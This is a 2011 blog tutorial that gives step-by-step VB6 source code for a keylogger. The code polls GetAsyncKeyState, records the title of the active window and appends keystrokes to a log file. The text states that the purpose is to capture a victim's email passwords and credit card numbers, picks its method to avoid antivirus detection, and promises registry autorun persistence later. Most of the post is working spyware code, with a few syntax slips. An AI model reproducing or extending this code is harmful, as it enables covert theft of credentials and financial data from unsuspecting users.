Thursday 10 November 2011

Building An Advance Level Keylogger In VB6


We all know what a keylogger is: a program that logs (records) the keyboard input on the system that its running. Since almost all of the information we enter in the system is through the keyboard, recording a victims keystrokes is an easy means of knowing his/her email passwords, credit card numbers and other information.

Moving on to our main point, building a keylogger in VB6 means implementing 3 things:
1- Listening (capturing) the keys that are being pressed. This is the sole purpose of a keylogger.
2- Getting the title of the window that these keys are being pressed in so that we know exactly what the pressed keys are for. This is not mendatory, but since its very helpful, we shall implement it in our keylogger.
3- Saving the listened keys and the window title to a file so that we (the hacker) can retrieve this information later.
4- Making our program autorun, so that it starts automatically with each windows boot. Again, this is not mendatory, but whats the use of losing our head coding a keylogger when it will run only once?

Now that we know exactly what we have to do, lets get to the practical part of our job.
Listening to keystrokes can be done in 3 ways. #1, by the windows built-in function GetAsyncKeyState(), #2, by the windows built-in method of Keyboard-Hooks, #3, by the windows built-in function GetKeyboardState(). The second method is easy to implement but its very obvious and antivirus software don't like programs without a recognized digital signature hooking the keyboard. Its a shoot-on-sight scene with them. Method 3 is safe like that but its very tedious, time consuming and boring to implement. So we are left with only method 1: the GetAsyncKeyState() windows function. Note that wherever "windows function" is said, it means that the mentioned function is already present in windows programming and we simply use it from there, we don't have to develop that function ourselves.

GetAsyncKeyState() windows function (the functions already present in windows functionality are known as API, so now onwards, when mentioning windows built-in functions, the term API shall be used) is present in the user32.dll file. This is how we use it in VB6:

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Since this is our core function, lets understand its functionality before using it. (Remember that hacking is about learning and discovering, not just stealing people's passwords. The aim of this tutorial is to help you become a hacker, not a pathetic script kiddie.) This function takes a Long value as input and returns an Integer as output. The Long value given to it (vKey) is the code of the key that we want to check. All the keys on the keyboard are assigned codes from 0 through 255. We provide the function with the code of our key, and it tells us if that key has been pressed by the user or not. A return value of 0 indicates that they key is not pressed, while any other value indicates that the mentioned key has been pressed by the user. Lets understand it with an example.

If GetAsyncKeyState(65) <> 0 Then
Form1.Caption = "A has been pressed."
Form1.Caption = "A has not been pressed."
End If

65 is the code of the "A" key. We check if GetAsyncKeyState for 65 returns 0 or something else. If it returns 0 then we know that A has not been pressed. If it returns something else (not zero) then it means that A has been pressed. Before continueing, lets learn the key-codes of the most frequent and important keys because we shall be listening for them in our logger.

Key-Code Key-Name
65-90 Alphabetical Keys A (65) to Z (90)
48-57 Numerical keys zero (48) to nine (57) above the alphabetical keys
96-105 Numerical keys on the numpad num0 (96) to num9 (105)
8 Backspace
9 Tab
13 Enter
27 Escape
16 Shift
20 Caps Lock
186-192 ; = , - . / `
219 and 221 [ and ]
222 ' (quote)
32 Space

There are codes for the Ctrl, Alt, Arrow keys and Insert, Home, Del etc keys too, but they are not important in keylogging. We have dealt with the most imporant aspect now, so lets move on to capturing the title of the window in which the user is entering the keys.

Getting the title of the active window involves two steps: #1, getting the handle (the window-ID) of the active window, #2, using that handle to get the title/caption of the window. Since it involves two jobs, hence two APIs are used. Here they are:

Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

As you can see, both the functions are once again in the USER32.DLL file. (Woo, what a coincidence! I suggest user32.dll be declared the official keylogging library :P )

Getting the title of the active window is done like this:

Function GetWinTitle() As String
Dim api_title As String 'this variable will store the title
Dim handle As Long
api_title = String$(350, Chr(0)) 'set the string length to 350. that should be enough for any window title
handle = GetForegroundWindow() 'get the handle of the window in focus
GetWindowText handle, api_title, 350 'and now get the title of the window
If Mid(api_title, 1, 1) = Chr(0) Then 'if the window has empty title
GetWinTitle = ""
Else 'if the window has a title then remove the null chars and return the title
GetWinTitle = Left(api_title, InStr(api_title, Chr(0)) - 1)
End If
End Function

We now have all the essentials required to build a keylogger. So lets get down with the practical phase: coding. What we shall be needing in our project is a form with a timer control. Set the timer name to tmrLog and set its interval to 50 (which means 20 times a second. that should be enough for accurate keylogging).

With the information we have learned above, we should start with this code in the form:
Option Explicit

'the core keylog function goes first
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

'and now the two functions required for capturing the active window title
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

'this array contains the key-values with respect to their key-codes. we shall be assigning its value in a function later
Dim keys(0 To 255) As String

'and it would be easier if the CAPS and SHIFT keys are declared separately as constants
Private Const CAPS As Long = 20
Private Const SHIFT As Long = 16

'and another variable that stores the state of the Caps Lock (on or off) is also helpful
Dim Caps_State As Boolean

'same goes for the shift key
Dim Shift_State As Boolean

'this is the logfile path and name where the logged data is to be saved
Private Const logfile As String = "C:mylog.txt"

'we start with the function that shall give us the window title
Private Function GetWinTitle() As String
    Dim api_title As String        'this variable will store the title
    Dim handle As Long
    api_title = String$(350, Chr(0))    'set the string length to 350. that should be enough for any window title
    handle = GetForegroundWindow()        'get the handle of the window in focus
    GetWindowText handle, api_title, 350    'and now get the title of the window
    If Mid(api_title, 1, 1) = Chr(0) Then     'if the window has empty title
        GetWinTitle = ""
    Else                    'if the window has a title then remove the null chars and return the title
        GetWinTitle = Left(api_title, InStr(api_title, Chr(0)) - 1)
    End If
End Function

'now we map the key-values to their key-codes (indexes) in the keys array
Private Function MapKeys()
    Dim i As Integer         'this would serve as the loop variable

    'starting with the alphabetic keys
    For i = 65 To 90
        keys(i) = Chr(i + 32)
    Next i

    'and the number keys above the alphabetical keys
    For i = 48 To 57
        keys(i) = Chr(i)
    Next i

    'and the numpad keys
    For i = 96 To 105
        keys(i) = "{num" & CStr(i - 96) & "}"
    Next i

    'and map the remainder of the keys manually
    keys(8) = "{BkSp}"
    keys(9) = "{Tab}"
    keys(13) = "{Ret}"    '13 is the enter key
    keys(32) = " "        '32 is the space key
    keys(186) = ";"
    keys(187) = "="
    keys(188) = ","
    keys(189) = "-"
    keys(190) = "."
    keys(191) = "/"
    keys(192) = "`"
    keys(219) = "["
    keys(220) = ""
    keys(221) = "]"
End Function

'this is the function that writes the logged data to our logfile
Private Function LogKey(ByRef key As String)
    'first off, we need to get two variables for title. this shall be understood as we proceed
    Static title As String, last_title As String

    'and now a string that contains all the keys that have been logged but not yet saved to file
    Static logdata As String

    'get the title of the active window (in which the given key has been pressed)
    title = GetWinTitle()

    'compare this with the last title to check if this is a different window or the same
    If title = last_title

        'this is the same window as the last one, save the logged data in variable, but don't write it to file yet
        logdata = logdata & key

        'this is a different window. we should write the logged data of the last window in file first
        Open logfile For Append As #1
            Print #1, "==" & title & "=="
            print #1, logdata & vbnewline
        Close #1

        'now save the new key in our log variable
        logdata = key
    End If

    'before exiting, we must remember that this title is now the last title (for the time when this function is used)
    last_title = title
End Function

'in the timer calls, we check for the pressed keys, and if a key of our interest has been pressed, we log it
Private Sub tmrLog_Timer()
    Dim i As Integer

    'we begin by checking the state of the SHIFT key
    If GetAsyncKeyState(SHIFT) <> 0 And Shift_State = False Then    'if shift has just been pressed NOW
        LogKey "[SHIFT pressed]"
        Shift_State = True
    ElseIf Shift_State = True Then                    'if shift has been released NOW
        LogKey "[SHIFT released]"
        Shift_State = False
    End If

    'and if the caps key is pressed, then we toggle the caps variable and log the change, too
    If GetAsyncKeyState(CAPS) <> 0 Then
        Caps_State = Not Caps_State
        If Caps_State = True Then
            LogKey "[CAPS LOCK on]"
            LogKey "[CAPS LOCK off]"
        End If
    End If

    'we do the rest of checking in a loop so that we don't have to check each key manually
    For i = 32 To 255
        If GetAsyncKeyState(i) <> 0 And keys(i) <> "" Then LogKey keys(i)
    Next i
End Sub
Build an exe file of this coding and see how it works. Do you see a lot of key entries when the key was pressed only once? This is due to the nature of the GetAsyncKeyState() API. We humans tend to be slower than the electronic signals so when we pressed a key even for a short while, it is detected as being pressed for a number of times in the GetAsyncKeyState() calls. Other than that, this keylogger should work fine (It works fine here on my system). Depending on the success of this introductory tutorial about building a full-fledge keylogger in VB6, I might add the methods to "refine" the input so that there is no garbage of logged keys and each key is logged only as much as it is pressed by the user. We shall also learn how to add an autorun registry key for our logger so that it is run automatically each time windows starts.

Until then, rate my this tutorial and inform me if it was useful to you, and what additional things I should to append to it

1 comment:

  1. My Friend I am trying this keylogger after designing it as instructed by you. However, this doesn't seem to give any results in Windows 8 operating system.

